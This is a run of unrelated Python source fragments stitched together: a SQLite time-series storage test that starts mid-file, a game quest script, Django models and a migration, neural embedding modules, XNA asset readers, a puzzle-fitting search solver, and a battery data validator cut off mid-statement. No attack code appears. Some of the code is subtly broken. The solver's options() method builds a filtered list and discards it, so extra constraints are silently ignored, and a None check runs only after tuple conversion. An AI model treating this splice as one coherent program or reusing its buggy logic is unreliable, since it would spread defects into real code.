dataTimeSeriesSQLiteStorage = storage.SQLiteStorage(in_memory=True) # Generate 10 slots DataTimeSeries with flowrate aggregated data dataTimeSeries = DataTimeSeries() for i in range(10): data = json.dumps({'flowrate_m3s_AVG':20.6+i, 'flowrate_m3s_MIN':20.6+i, 'flowrate_m3s_MAX':20.6+i, 'volume_m3_TOT':20.6+i}) dataTimeSlot = DataTimeSlot(start = TimePoint(t=1436022000 + (i*60),tz="Europe/Rome"), end = TimePoint(t=1436022000 + ((i+1)*60), tz="Europe/Rome"), data = data, span=TimeSlotSpan('60s')) dataTimeSeries.append(dataTimeSlot) # Generate 10 points DataTimeSeries with light aggregated data dataTimeSeries_light = DataTimeSeries() for i in range(10): data = json.dumps({'light_pct_AVG':20.6+i}) dataTimeSlot = DataTimeSlot(start = TimePoint(t=1436022000 + (i*60),tz="Europe/Rome"), end = TimePoint(t=1436022000 + ((i+1)*60), tz="Europe/Rome"), data = data, span=TimeSlotSpan('60s')) dataTimeSeries_light.append(dataTimeSlot) # Test put data without id (not implemented for now) with self.assertRaises(NotImplementedError): data_id_1 = dataTimeSeriesSQLiteStorage.put(dataTimeSeries) # Test put data with id and no right to create structure with self.assertRaises(StorageException): dataTimeSeriesSQLiteStorage.put(dataTimeSeries, id='0000001') # Test get with id and no structure in the storage with self.assertRaises(StorageException): _ = dataTimeSeriesSQLiteStorage.get(id='0000001', timeSpan='60s', cached=True) # Test put data with id and right to create structure AND get with id and without from_dt/to_dt # TODO: this is not correct unit test of the put and get. It is testing them at the same time! dataTimeSeriesSQLiteStorage.put(dataTimeSeries, id='0000001', can_initialize=True) out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(id='0000001', timeSpan='60s', cached=True) # Check length self.assertEqual(len(out_streamingDataTimeSeries), len(dataTimeSeries)) return #===================================================== # TODO: Finish adapting the tests for this storage #===================================================== # Quick test #for i, dataPoint in enumerate(dataTimeSeries): # print dataPoint # #self.assertEqual(.t, dataPoint.strat.t) # #self.assertEqual(out_streamingDataTimeSeries[dataPoint.start.t].data, dataPoint.data) # Time Series equality does not work anymore (therefore the above quick tests) #self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries) # Test get of no data: out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(id='0000002', timeSpan='60s', cached=True) # We can check the equality against a simple DataTimeSeries empyt_dataTimeSeries = DataTimeSeries() self.assertEqual(out_streamingDataTimeSeries, empyt_dataTimeSeries) # The following test is just for confirm of the above steps. Should not be here in a proper unittesting approach. self.assertNotEqual(out_streamingDataTimeSeries, dataTimeSeriesSQLiteStorage.get(id='0000001', timeSpan='60s', cached=True)) # Now test the get with start_dt and end_dt from_dt = dt(2015,7,4,17,3,0, tzinfo='Europe/Rome') to_dt = dt(2015,7,4,17,6,0, tzinfo='Europe/Rome') out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(id='0000001', from_dt = from_dt, to_dt = to_dt, timeSpan = '60s', cached = True) dataTimeSeries_filtered = dataTimeSeries.filter(from_dt = from_dt, to_dt=to_dt) self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries_filtered) # Also test that if we go trough the cached streaminTimeSeries again, we get the same result: self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries_filtered) # Now get the time series without caching: out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(id='0000001', from_dt = from_dt, to_dt = to_dt, timeSpan = '60s') # Check that we can compare it as is even if it is not cached: self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries_filtered) # Check that we can compare it again: self.assertEqual(out_streamingDataTimeSeries, dataTimeSeries_filtered) # Now get AGAIn the time series without caching: out_streamingDataTimeSeries = dataTimeSeriesSQLiteStorage.get(id='0000001', from_dt = from_dt, to_dt = to_dt, timeSpan = '60s') # But this time do not test any comparisons (that triggers the caching of the TimeSeries), # instead test that going trough it twice we achieve the same result (under the hood we go twice in the DB): items_A = [item for item in out_streamingDataTimeSeries] items_B = [item for item in out_streamingDataTimeSeries] self.assertEqual(items_A, items_B) # WARNING: This is specific to SLQlite and its dataTimeStream self.assertEqual(out_streamingDataTimeSeries.dataTimeStream.get_statistics()['source_acceses'], 2) # Now foce load te time series: out_streamingDataTimeSeries.force_load() # After force-loading, another soruce acces is performed self.assertEqual(out_streamingDataTimeSeries.dataTimeStream.get_statistics()['source_acceses'], 3) items_C = [item for item in out_streamingDataTimeSeries] self.assertEqual(items_A, items_C) # Generating the list items_C after a force_load should not generate a new source_access self.assertEqual(out_streamingDataTimeSeries.dataTimeStream.get_statistics()['source_acceses'], 3) # Perform again the iterator check: items_A = [item for item in out_streamingDataTimeSeries] items_B = [item for item in out_streamingDataTimeSeries] self.assertEqual(items_A, items_B) # And ensure that the source accesses is still set to three self.assertEqual(out_streamingDataTimeSeries.dataTimeStream.get_statistics()['source_acceses'], 3) def tearDown(self): pass
MASTEMA = 2151009 sm.setSpeakerID(MASTEMA) if not sm.canHold(1142556): sm.sendNext("Please clear some space in your equip inventory.") sm.dispose() sm.sendNext("You made it back, #h #! How are you?") sm.flipDialoguePlayerAsSpeaker() sm.sendSay("I didn't know I had such anger within me. It is not easy to control.") sm.setSpeakerID(MASTEMA) if sm.sendAskYesNo("But you succeeded, #h #! I should write this down for posterity, right?"): sm.completeQuest(parentID) sm.giveItem(1142556) sm.giveAndEquip(1099009) sm.jobAdvance(chr.getJob()+1) sm.sendSayOkay("Your inner rage is now under your control, #h #! All that's elft for you is to keep training.")
""" Virtual Namespace for 3rd party openaps contributions """ from pkg_resources import declare_namespace from pkgutil import extend_path __path__ = extend_path(__path__, __name__) declare_namespace(__name__)
import itertools import json import math import os import random import sys import time from matplotlib.colors import to_hex from shapely.geometry import Point, Polygon import matplotlib.pyplot as plt import numpy as np PROBLEM_FILEDIR = "problems" SOLUTION_FILEDIR = "solutions" sys.setrecursionlimit(1000000) def vadd(a,b): return tuple(map(sum, zip(a,b))) def vsub(a,b): return tuple(map(lambda x: x[0]-x[1], zip(a,b))) def dist(a, b): return (a[0]-b[0])**2 + (a[1]-b[1])**2 def plot_hole(hole): xs, ys = zip(*hole) xs = list(xs) ys = list(ys) xs.append(xs[0]) ys.append(ys[0]) plt.plot(xs,ys,c='b') def plot_figure(edges, vertices): for edge in edges: a = vertices[edge[0]] b = vertices[edge[1]] xs, ys = zip(a,b) plt.plot(xs, ys,c='r') class problem(): def __init__(self, number): json_state = json.load(open(os.path.join(PROBLEM_FILEDIR, str(number) + ".json"))) self.number = number self.hole = hole(json_state["hole"]) self.figure = figure(json_state) class hole(): def __init__(self, vertices): self.vertices = vertices self.num_vertices = len(vertices) self.vertex_cycle = self.vertices + [self.vertices[0]] self.edges = list(zip(self.vertex_cycle[:-1], self.vertex_cycle[1:])) self.polygon = Polygon(self.vertices) self.inside_set = set() self.dist_dict = {} xs, ys = zip(*self.vertices) for x in range(min(xs), max(xs)+1): for y in range(min(ys), max(ys)+1): if self.polygon.covers(Point(x,y)): self.inside_set.add((x,y)) self.dist_dict[x,y] = [dist((x,y), v) for v in self.vertices] def inside(self, point): """Checks if point is inside the hole.""" if isinstance(point, tuple): return point in self.inside_set return tuple(point) in self.inside_set def dislikes(self, positions): """Calculates the minimum distance to a vertex in positions for each vertex in the hole.""" return [min([dist(h, v) for v in positions]) for h in self.vertices] def plot(self): """Plot the hole.""" xs, ys = zip(*self.vertex_cycle) plt.plot(xs,ys,c='b') class figure(): def __init__(self, problem): self.edges = [(min(a,b), max(a,b)) for (a,b) in problem["figure"]["edges"]] orig_vertices = problem["figure"]["vertices"] self.edge_dists = [] for edge in self.edges: edge_dist = dist(orig_vertices[edge[0]], orig_vertices[edge[1]]) self.edge_dists.append([edge_dist * (1 - problem["epsilon"]/1000000.0), edge_dist * (1 + problem["epsilon"]/1000000.0)]) self.hole = hole(problem["hole"]) self.build_adjacency() self.num_vertices = len(self.adjacency) def build_adjacency(self): self.adjacency = {} self.adj_dists = {} self.adj_vecs = {} for edge_ind, edge in enumerate(self.edges): if edge[0] in self.adjacency: self.adjacency[edge[0]].append(edge[1]) else: self.adjacency[edge[0]] = [edge[1]] if edge[1] in self.adjacency: self.adjacency[edge[1]].append(edge[0]) else: self.adjacency[edge[1]] = [edge[0]] self.adj_dists[edge[0],edge[1]] = self.edge_dists[edge_ind] self.adj_dists[edge[1],edge[0]] = self.edge_dists[edge_ind] self.adj_vecs[edge[0],edge[1]] = ring_options((0,0), *self.edge_dists[edge_ind]) self.adj_vecs[edge[1],edge[0]] = self.adj_vecs[edge[0],edge[1]] def begin_search(self, best_sol = None): """Begin the search for a solution. If passed best_sol, will return the first solution at least that good.""" initial_candidates = [partial_figure(self, vertex_index, hole_index) for hole_index in range(self.hole.num_vertices) for vertex_index in range(self.num_vertices)] result = search(initial_candidates, target=best_sol).run() # if v_result is None: # continue # if best_sol is not None: # if v_result.sum_dislikes <= best_sol: # return v_result # elif best_result is not None and v_result.sum_dislikes < best_result.sum_dislikes: # best_result = v_result # elif best_result is None: # best_result = v_result # except: # print("Error") # continue print("result", result) return result def check_line_intersection(line1, line2): """Given two line segments (each defined by two (x,y) pairs), return true if the two segments intersect and false if they do not.""" x1, y1 = line1[0] x2, y2 = line1[1] x3, y3 = line2[0] x4, y4 = line2[1] denom = (x1-x2)*(y3-y4) - (y1-y2)*(x3-x4) if denom == 0: return False ua = ((x1*y2 - y1*x2) * (x3-x4) - (x1-x2) * (x3*y4 - y3*x4)) / denom ub = ((x1*y2 - y1*x2) * (y3-y4) - (y1-y2) * (x3*y4 - y3*x4)) / denom return 0 <= ua <= 1 and 0 <= ub <= 1 def ring_intersection(hole, ca, cb, ed_a, ed_b): """Given two ring centers ca and cb, and two squared radii ranges ed_a and ed_b, find the integer points that are in both rings. Begins by finding the quadrilateral of the 'possible region', and then looks for integer points within that region.""" d = dist(ca, cb) if d == 0: return ring_options(ca, max(ed_a[0], ed_b[0]), min(ed_a[1], ed_b[1])) plus = [] minus = [] for ra, rb in itertools.product(ed_a, ed_b): xc = 0.5 * (ca[0] + cb[0]) + (ra - rb)/(2*d) * (cb[0] - ca[0]) xd = 0.5 * math.sqrt(2 * (ra + rb)/(d) - (ra - rb)**2/(d**2) - 1) * (cb[1] - ca[1]) yc = 0.5 * (ca[1] + cb[1]) + (ra - rb)/(2*d) * (cb[1] - ca[1]) yd = 0.5 * math.sqrt(2 * (ra + rb)/(d) - (ra - rb)**2/(d**2) - 1) * (ca[0] - cb[0]) plus.append((xc+xd, yc+yd)) minus.append((xc-xd, yc-yd)) for flip in [plus, minus]: pxs, pys = zip(*flip) guesses = list(itertools.product(range(math.ceil(min(pxs)), math.floor(max(pxs))+1), range(math.ceil(min(pys)), math.floor(max(pys))+1))) guesses = [g for g in guesses if ed_a[0] <= dist(g, ca) <= ed_a[1] and ed_b[0] <= dist(g, cb) <= ed_b[1] and hole.inside(g)] # plt.scatter(pxs, pys) if len(guesses) > 0: return guesses return [] def ring_quad_options(r1, r2): """Given two squared radii, yield all integer lattice points in the first quadrant of that ring.""" for x in range(math.floor(math.sqrt(r2))): if x ** 2 > r1: min_y1 = 0 else: min_y1 = math.ceil(math.sqrt(r1 - x**2)) max_y2 = math.floor(math.sqrt(r2 - x**2)) for y in range(min_y1, max_y2+1): yield (x, y) def ring_options(center, r1, r2): """Given a center point and two radii, return a list of all integer lattice points in the ring.""" quad = ring_quad_options(r1, r2) result = set() for q in quad: if q == (0,0): result.add(center) else: result.add((center[0] + q[0], center[1] + q[1])) result.add((center[0] + q[0], center[1] - q[1])) result.add((center[0] - q[0], center[1] + q[1])) result.add((center[0] - q[0], center[1] - q[1])) return set(result) class partial_figure(): def __init__(self, figure, vertex_index = None, hole_index = None, to_plot = False): self.figure = figure self.adjacency = figure.adjacency self.adj_dists = figure.adj_dists self.vertices = [(None, None) for _ in range(self.figure.num_vertices)] self.to_extend = set() self.extended = set() self.dislikes = [9999999 for _ in range(self.figure.hole.num_vertices)] if vertex_index is not None and hole_index is not None: self.begin(vertex_index, hole_index) self.plot = to_plot @property def sum_dislikes(self): return sum(self.dislikes) def valid(self, vertex_index, next_pos): """Return True iff the part of the figure relating to making vertex_index next_pos is valid.""" if not self.figure.hole.inside(next_pos): return False for edge in self.adjacency[vertex_index]: edge_pos = self.vertices[edge] if edge_pos[0] is not None: dee = dist(next_pos, edge_pos) if dee < self.adj_dists[vertex_index, edge][0] or dee > self.adj_dists[vertex_index, edge][1]: return False for hedge in self.figure.hole.edges: if check_line_intersection([next_pos, edge_pos], hedge): return False return True def valid_full(self): """Return True iff the figure is valid. This checks the validity of the whole figure.""" for vertex in self.vertices: if not self.figure.hole.inside(vertex): return False for edge in self.figure.edges: edge0 = tuple(self.vertices[edge[0]]) edge1 = tuple(self.vertices[edge[1]]) if edge0 is None or edge1 is None: return False dee = dist(edge0, edge1) if dee < self.adj_dists[(edge[0], edge[1])][0] or dee > self.adj_dists[(edge[0], edge[1])][1]: return False for hedge in self.figure.hole.edges: if check_line_intersection([edge0, edge1], hedge): return False return True def begin(self, vertex_index, hole_index): """Initialize with the vertex_index at hole_index; return self.""" self.vertices[vertex_index] = self.figure.hole.vertices[hole_index] self.to_extend = self.to_extend.union(self.adjacency[vertex_index]) self.extended.add(vertex_index) self.dislikes = self.figure.hole.dislikes([self.vertices[vertex_index]]) return self def expand(self): """Return a list of partial figures or placeholder partial figures, each of which has been extended by the next edge removed from to_extend.""" if len(self.to_extend) == 0: return None next_vertex = self.to_extend.pop() self.extended.add(next_vertex) return_list = [] for next_pos in self.options(next_vertex): if next_pos is not None: return_list.append(self.copy_with(next_vertex, next_pos)) if len(return_list) > 0: return return_list else: return None def options(self, next_vertex): """Return a list of positions where it would be possible to place the next vertex.""" # Later I check for other validity; should I just do integer validity here? constraints = [(v, self.vertices[v]) for v in self.adjacency[next_vertex] if v in self.extended] other_ind, other_pos = constraints[0] poss = {vadd(other_pos, vec) for vec in self.figure.adj_vecs[next_vertex, other_ind]} poss = {v for v in poss if v in self.figure.hole.inside_set} for constraint in constraints[1:]: other_ind, other_pos = constraint [v for v in poss if vsub(other_pos, v) in self.figure.adj_vecs[next_vertex, other_ind]] return poss # elif len(constraints) == 2: # return ring_intersection(self.figure.hole, constraints[0][0], constraints[1][0], constraints[0][1], constraints[1][1]) # else: # candidates = None # for cona, conb in itertools.product(constraints): # TODO: this actually only needs the sorted product? # new_candidates = set(ring_intersection(self.figure.hole, cona[0], conb[0], cona[1], conb[1])) # if candidates is not None: # candidates = candidates.intersection(new_candidates) # if len(candidates) == 0: # return None # else: # candidates = new_candidates # return list(candidates) def copy_with(self, next_vertex, next_pos): """Return a copy of self, extended by the next vertex at next_pos.""" if not self.valid(next_vertex, next_pos): return None novel = partial_figure(self.figure) novel.vertices = self.vertices.copy() novel.vertices[next_vertex] = next_pos novel.to_extend = self.to_extend.union([v for v in self.adjacency[next_vertex] if v not in self.extended]) novel.extended = self.extended.copy() novel.dislikes = [min(a,b) for a,b in zip(self.dislikes, self.figure.hole.dislikes([next_pos]))] if self.plot: plot_hole(self.figure.hole.vertices) pruned_edges = [e for e in self.figure.edges if e[0] in novel.extended and e[1] in novel.extended] plot_figure(pruned_edges, novel.vertices) plt.scatter(next_pos[0], next_pos[1], c='m') plt.title(str(next_pos)) plt.show() return novel class search(): def __init__(self, candidates: list, target=None): if len(candidates) == 0: return None self.num_searched=0 self.candidates = set(candidates) self.finished = None self.target = target def run(self): while len(self.candidates) > 0 and (self.finished is None or self.finished.sum_dislikes > self.target): self.step() return self.finished def step(self): """step randomly picks a candidate to expand from the set and expands it.""" # if target is not None and len(candidates[0].to_extend) == 0 and sum(candidates[0].dislikes) <= target: # return candidates[0] # next_expansion = self.candidates.pop() next_expansion = sorted(self.candidates, key=lambda f: f.sum_dislikes)[0] self.candidates.remove(next_expansion) if self.num_searched % 100 == 0: print(self.num_searched, len(self.candidates), self.finished.sum_dislikes if self.finished else "-", len(next_expansion.extended), len(next_expansion.to_extend)) expansion = next_expansion.expand() if expansion is not None: for e in expansion: if e is None: continue if len(e.to_extend) == 0 and e.valid_full(): if self.finished is None: self.finished = e elif e.sum_dislikes < self.finished.sum_dislikes: self.finished = e elif len(e.to_extend) > 0 and e not in self.candidates: self.candidates.add(e) self.num_searched += 1 if __name__ == "__main__": numbers = [24] #[21, 24, 25, 26, 34, 35, 38, 39, 41] for number in numbers: p = problem(number) result = p.figure.begin_search(best_sol=0) if result is None: print("No solution found") else: plot_hole(p.figure.hole.vertices) plot_figure(p.figure.edges, result.vertices) print(result.sum_dislikes) print(result.dislikes) print(p.figure.hole.dislikes(result.vertices)) plt.show() json.dump({"vertices": result.vertices}, open(os.path.join("solutions",f"{number}-{result.sum_dislikes}-{time.time()}.json"),'w'))
from __future__ import unicode_literals from django.db import models from sortedm2m.fields import SortedManyToManyField from django.utils.encoding import python_2_unicode_compatible @python_2_unicode_compatible class Author(models.Model): name = models.CharField(max_length=100) def __str__(self): return self.name @python_2_unicode_compatible class Book(models.Model): name = models.CharField(max_length=100) authors = SortedManyToManyField(Author) def __str__(self): return self.name
# Generated by Django 3.0.6 on 2020-10-18 14:50 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Task', fields=[ ('id', models.AutoField(primary_key=True, serialize=False)), ('title', models.CharField(max_length=250)), ('date', models.DateField()), ('status', models.CharField(max_length=1)), ], ), ]
import math from typing import Tuple, Union, Optional import torch from torch import nn from torch import Tensor from flambe.compile import registrable_factory from flambe.nn.module import Module class Embeddings(Module): """Implement an Embeddings module. This object replicates the usage of nn.Embedding but registers the from_pretrained classmethod to be used inside a Flambé configuration, as this does not happen automatically during the registration of PyTorch objects. The module also adds optional positional encoding, which can either be sinusoidal or learned during training. For the non-learned positional embeddings, we use sine and cosine functions of different frequencies. .. math:: \text{PosEncoder}(pos, 2i) = sin(pos/10000^(2i/d_model)) \text{PosEncoder}(pos, 2i+1) = cos(pos/10000^(2i/d_model)) \text{where pos is the word position and i is the embed idx) """ def __init__(self, num_embeddings: int, embedding_dim: int, padding_idx: int = 0, max_norm: Optional[float] = None, norm_type: float = 2., scale_grad_by_freq: bool = False, sparse: bool = False, positional_encoding: bool = False, positional_learned: bool = False, positonal_max_length: int = 5000) -> None: """Initialize an Embeddings module. Parameters ---------- num_embeddings : int Size of the dictionary of embeddings. embedding_dim : int The size of each embedding vector. padding_idx : int, optional Pads the output with the embedding vector at :attr:`padding_idx` (initialized to zeros) whenever it encounters the index, by default 0 max_norm : Optional[float], optional If given, each embedding vector with norm larger than :attr:`max_norm` is normalized to have norm :attr:`max_norm` norm_type : float, optional The p of the p-norm to compute for the :attr:`max_norm` option. Default ``2``. scale_grad_by_freq : bool, optional If given, this will scale gradients by the inverse of frequency of the words in the mini-batch. Default ``False``. sparse : bool, optional If ``True``, gradient w.r.t. :attr:`weight` matrix will be a sparse tensor. See Notes for more details. positional_encoding : bool, optional If True, adds positonal encoding to the token embeddings. By default, the embeddings are frozen sinusodial embeddings. To learn these during training, set positional_learned. Default ``False``. positional_learned : bool, optional Learns the positional embeddings during training instead of using frozen sinusodial ones. Default ``False``. positonal_max_length : int, optional The maximum length of a sequence used for the positonal embedding matrix. Default ``5000``. """ super().__init__() self.num_embeddings = num_embeddings self.embedding_dim = embedding_dim self.num_positions = positonal_max_length self.token_embedding = nn.Embedding(num_embeddings, embedding_dim, padding_idx, max_norm, norm_type, scale_grad_by_freq, sparse) self.pos_embedding = None if positional_learned and not positional_encoding: raise ValueError("postional_encoding is False, but positonal_learned is True") elif positional_encoding and positional_learned: self.pos_embedding = nn.Embedding(positonal_max_length, embedding_dim) elif positional_encoding and not positional_learned: # Use sinusodial encoding position = torch.arange(0, positonal_max_length, dtype=torch.float).unsqueeze(1) div_term = torch.arange(0, embedding_dim, 2).float() div_term = torch.exp(div_term * (-math.log(10000.0) / embedding_dim)) pos_embedding = torch.zeros(positonal_max_length, embedding_dim) pos_embedding[:, 0::2] = torch.sin(position * div_term) pos_embedding[:, 1::2] = torch.cos(position * div_term) self.pos_embedding = nn.Embedding.from_pretrained(pos_embedding, freeze=True) @registrable_factory @classmethod def from_pretrained(cls, embeddings: Tensor, freeze: bool = True, padding_idx: int = 0, max_norm: Optional[float] = None, norm_type: float = 2.0, scale_grad_by_freq: bool = False, sparse: bool = False, positional_encoding: bool = False, positional_learned: bool = False, positonal_max_length: int = 5000, positonal_embeddings: Optional[Tensor] = None, positonal_freeze: bool = True): """Create an Embeddings instance from pretrained embeddings. Parameters ---------- embeddings: torch.Tensor FloatTensor containing weights for the Embedding. First dimension is being passed to Embedding as num_embeddings, second as embedding_dim. freeze: bool If True, the tensor does not get updated in the learning process. Default: True padding_idx : int, optional Pads the output with the embedding vector at :attr:`padding_idx` (initialized to zeros) whenever it encounters the index, by default 0 max_norm : Optional[float], optional If given, each embedding vector with norm larger than :attr:`max_norm` is normalized to have norm :attr:`max_norm` norm_type : float, optional The p of the p-norm to compute for the :attr:`max_norm` option. Default ``2``. scale_grad_by_freq : bool, optional If given, this will scale gradients by the inverse of frequency of the words in the mini-batch. Default ``False``. sparse : bool, optional If ``True``, gradient w.r.t. :attr:`weight` matrix will be a sparse tensor. See Notes for more details. positional_encoding : bool, optional If True, adds positonal encoding to the token embeddings. By default, the embeddings are frozen sinusodial embeddings. To learn these during training, set positional_learned. Default ``False``. positional_learned : bool, optional Learns the positional embeddings during training instead of using frozen sinusodial ones. Default ``False``. positonal_embeddings: torch.Tensor, optional If given, also replaces the positonal embeddings with this matrix. The max length will be ignored and replaced by the dimension of this matrix. positonal_freeze: bool, optional Whether the positonal embeddings should be frozen """ if embeddings.dim() != 2: raise ValueError('Embeddings parameter is expected to be 2-dimensional') if positonal_embeddings is not None: if positonal_embeddings.dim() != 2: raise ValueError('Positonal embeddings parameter is expected to be 2-dimensional') if positonal_embeddings.size() != embeddings.size(): raise ValueError('Both pretrained matrices must have the same dimensions') rows, cols = embeddings.shape positional_encoding = positional_encoding or (positonal_embeddings is not None) embedding = cls(num_embeddings=rows, embedding_dim=cols, padding_idx=padding_idx, max_norm=max_norm, norm_type=norm_type, scale_grad_by_freq=scale_grad_by_freq, sparse=sparse, positional_encoding=positional_encoding, positional_learned=positional_learned, positonal_max_length=positonal_max_length) embedding.token_embedding.weight.data = embeddings embedding.token_embedding.weight.requires_grad = not freeze if positonal_embeddings is not None: embedding.pos_embedding.weight.data = positonal_embeddings # type: ignore embedding.pos_embedding.weight.requires_grad = not positonal_freeze # type: ignore return embedding def forward(self, data: Tensor) -> Tensor: """Perform a forward pass. Parameters ---------- data : Tensor The input tensor of shape [S x B] Returns ------- Tensor The output tensor of shape [S x B x E] """ out = self.token_embedding(data) if self.pos_embedding is not None: column = torch.arange(data.size(0)).unsqueeze(1) positions = column.repeat(1, data.size(1)).to(data) out = out + self.pos_embedding(positions) return out class Embedder(Module): """Implements an Embedder module. An Embedder takes as input a sequence of index tokens, and computes the corresponding embedded representations, and padding mask. The encoder may be initialized using a pretrained embedding matrix. Attributes ---------- embeddings: Module The embedding module encoder: Module The sub-encoder that this object is wrapping pooling: Module An optional pooling module drop: nn.Dropout The dropout layer """ def __init__(self, embedding: Module, encoder: Module, pooling: Optional[Module] = None, embedding_dropout: float = 0, padding_idx: Optional[int] = 0) -> None: """Initializes the TextEncoder module. Extra arguments are passed to the nn.Embedding module. Parameters ---------- embedding: nn.Embedding The embedding layer encoder: Module The encoder pooling: Module, optional An optioonal pooling module, takes a sequence of Tensor and reduces them to a single Tensor. embedding_dropout: float, optional Amount of dropout between the embeddings and the encoder padding_idx: int, optional Passed the nn.Embedding object. See pytorch documentation. """ super().__init__() self.embedding = embedding self.dropout = nn.Dropout(embedding_dropout) self.encoder = encoder self.pooling = pooling self.padding_idx = padding_idx def forward(self, data: Tensor) -> Union[Tensor, Tuple[Tensor, Tensor]]: """Performs a forward pass through the network. Parameters ---------- data : torch.Tensor The input data, as a float tensor of shape [S x B] Returns ------- Union[Tensor, Tuple[Tensor, Tensor]] The encoded output, as a float tensor. May return a state if the encoder is an RNN and no pooling is provided. """ embedded = self.embedding(data) embedded = self.dropout(embedded) padding_mask: Optional[Tensor] if self.padding_idx is not None: padding_mask = (data != self.padding_idx).byte() encoding = self.encoder(embedded, padding_mask=padding_mask) else: padding_mask = None encoding = self.encoder(embedded) if self.pooling is not None: # Ignore states from encoders such as RNN or TransformerSRU encoding = encoding[0] if isinstance(encoding, tuple) else encoding encoding = self.pooling(encoding, padding_mask) return encoding
#!/usr/bin/env python3 #coding=utf8 from . import * from collections import namedtuple as _nt Texture2d = _nt('Texture2d', 'format width height miplevels') def texture2d(factory): fmt = u32(factory) w = u32(factory) h = u32(factory) n = u32(factory) mips = n * [None] for i in range(n): dsize = u32(factory) mips[i] = factory.stream.read_bytes(dsize) return Texture2d(fmt, w, h, mips) add_reader(texture2d, 'Microsoft.Xna.Framework.Content.Texture2DReader', 'Microsoft.Xna.Framework.Graphics.Texture2D') Effect = _nt('Effect', 'bytecode') def effect(factory): return Effect(genericlist(byte, factory)) add_reader(effect, 'Microsoft.Xna.Framework.Content.EffectReader', 'Microsoft.Xna.Framework.Graphics.Effect') SpriteFont = _nt('SpriteFont', 'texture glyphs crop charmap vspace hspace kerning defchar') def spritefont(factory): return SpriteFont(factory.read(), factory.read(), factory.read(), factory.read(), i32(factory), single(factory), factory.read(), nullable(char, factory)) add_reader(spritefont, 'Microsoft.Xna.Framework.Content.SpriteFontReader', 'Microsoft.Xna.Framework.Graphics.SpriteFont')
# Copyright [2020] [Toyota Research Institute] # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Classes for advanced or specialized validation procedures on cycler data. Validation classes are designed to work with datapaths, meaning column names of input dataframes are standardized according to the validation schema. """ import os import numpy as np from monty.serialization import loadfn from beep import VALIDATION_SCHEMA_DIR DEFAULT_ARBIN_SCHEMA = os.path.join(VALIDATION_SCHEMA_DIR, "schema-arbin-lfp.yaml") DEFAULT_EIS_SCHEMA = os.path.join(VALIDATION_SCHEMA_DIR, "schema-maccor-eis.yaml") PROJECT_SCHEMA = os.path.join(VALIDATION_SCHEMA_DIR, "schema-projects.yaml") class SimpleValidator: """ Lightweight class that does Dataframe-based, as opposed to dictionary based validation Note that schemas here are made to be identical to cerberus schemas and should support similar syntax, e. g. {COLUMN_NAME: {schema: type: TYPE_IN_COLUMN, [int, float, str, object] max: MAX_VALUE_IN_COLUMN, min: MIN_VALUE_IN_COLUMN type: list } } Note that the COLUMN_NAME.type key above is ignored, but COLUMN_NAME.schema.type is used. The only schema keys that are supported at this time are max, min, and type. Typing is compared using the key-mapping by rule defined by the ALLOWED_TYPES_BY_RULE attribute defined below. Supported type rules include "integer", "float", "numeric", and "string". Note that type-checking for this class is not equivalent to checking types, and may involve custom logic which is defined in the check_type method below. """ def __init__(self, schema_filename=DEFAULT_ARBIN_SCHEMA): """ Args: schema (dict): Schema to validate against. """ self.schema = loadfn(schema_filename) self.validation_records = None @staticmethod def check_type(df, type_rule): """ Method to check type of input dataframe. Args: df (pandas.Dataframe): DataFrame. type_rule (str): string corresponding to type_rule to check, supported type rules are: integer: checks for numeric values which are equal to their rounded values Returns: bool: valid str: verbose description of reason """ if type_rule not in ["integer", "float", "numeric", "string"]: raise ValueError( "type_rule {} not supported, please choose one " "of integer, float, numeric, or string" ) # Integer: Check residual from rounding if type_rule == "integer": nonint_indices = np.arange(len(df))[(df != np.round(df))] if nonint_indices.size > 0: value = df.iloc[nonint_indices[0]] return ( False, "integer type check failed at index {} with value {}".format( nonint_indices[0], value ), ) # Float: just check numpy dtyping elif type_rule == "float": if not np.issubdtype(df.dtype, np.floating): return False, "float type check failed, type is {}".format(df.dtype) # Numeric: check numpy number dtyping elif type_rule == "numeric": if not np.issubdtype(df.dtype, np.number): return False, "number type check failed, type is {}".format(df.dtype) # String: check string/unicode subdtype elif type_rule == "string": if not ( np.issubdtype(df.dtype, np.object_) or np.issubdtype(df.dtype, np.unicode_) ): return False, "string type check failed, type is {}".format(df.dtype) return True, "" def validate(self, dataframe): """ Method to run the validation on everything, and report the results, i. e. which columns are inconsistent with the schema. Args: dataframe (pandas.DataFrame): dataframe to be validated. Returns: dict: report corresponding to each validation str: reason for report validation failure, empty string on report validation success """ dataframe = dataframe.rename(str.lower, axis="columns") for column_name, value in self.schema.items(): column_schema = value["schema"] max_at_least_rule = column_schema.get("max_at_least") min_is_below_rule = column_schema.get("min_is_below") max_rule = column_schema.get("max") min_rule = column_schema.get("min") type_rule = column_schema.get("type") monotonic_rule = column_schema.get("monotonic") # Check type if type_rule is not None: validity, reason = self.check_type( dataframe[column_name], type_rule=type_rule ) if not validity: reason = "Column {}: {}".format(column_name, reason) return validity, reason # Check max if max_rule is not None: comp = np.where(dataframe[column_name] > max_rule) if comp[0].size > 0: index = comp[0][0] value = dataframe[column_name].iloc[index] reason = ( "{} is higher than allowed max {} at index {}: " "value={}".format(column_name, max_rule, index, value) ) return False, reason # Check min if min_rule is not None: comp = np.where(dataframe[column_name] < min_rule) if comp[0].size > 0: index = comp[0][0] value = dataframe[column_name].iloc[index] reason = ( "{} is lower than allowed min {} at index {}:" "value={}".format(column_name, min_rule, index, value) ) return False, reason # Check a maximum value is at least above a threshold if max_at_least_rule is not None: comp = np.where(dataframe[column_name].max() < max_at_least_rule) if comp[0].size > 0: index = comp[0][0] value = dataframe[column_name].iloc[index] reason = ( "{} needs to reach at least {} for processing, instead found:" "value={}".format(column_name, max_at_least_rule, 